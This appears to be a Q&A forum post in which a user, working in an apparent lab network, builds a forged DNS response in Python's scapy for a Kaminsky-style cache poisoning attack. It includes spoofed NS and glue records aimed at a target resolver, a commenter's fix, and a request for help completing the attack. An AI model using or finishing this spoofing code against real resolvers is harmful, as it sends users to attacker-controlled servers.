# Build DNS packet with scapy

Tags: python, dns, wireshark, scapy, packet

I'm trying to perform the "Dan's Shenanigans" described in [this tutorial](http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html), I succesfully sniff the root DNS ip, the port and the query id, but when I try to build the response packet in order to poison the cache of the recursive server I receive a malformed packet as error on wireshark. This is the code for building the packet:

```
pkt = (IP( src = sniffed_ip, dst='192.168.56.20')
       / UDP(sport=53, dport=sniffed_port)
       / DNS(id=query_id, qr=1, nscount=1, an=None, arcount=1,
             qd=DNSRR(rrname='bankofsteve.com', rdata='192.168.56.1', type="A"),
             ns=(DNSRR(rrname = 'bankofsteve.com', type='NS', ttl=36000, rdata='ns.bankofallan.co.uk.')),
             ar=(DNSRR(rrname='ns.bankofsteve.com.', type="A", ttl=36000, rdata='192.168.56.1'))))
```

'192.168.56.1' is the ip of the bad dns server while '192.168.56.20' is the ip of the target recursive server

This is my error:
[image]
Thanks in advance for helping me

Comment: In `qd` it is probably more `DNSQR` with `qname` than `DNSRR`; Have a look at this resource: https://thepacketgeek.com/scapy-p-09-scapy-and-dns/

Comment: Thank you very much, it was the problem! Anyway I cannot perform the attack, do you know if I have to add other fields to make it work?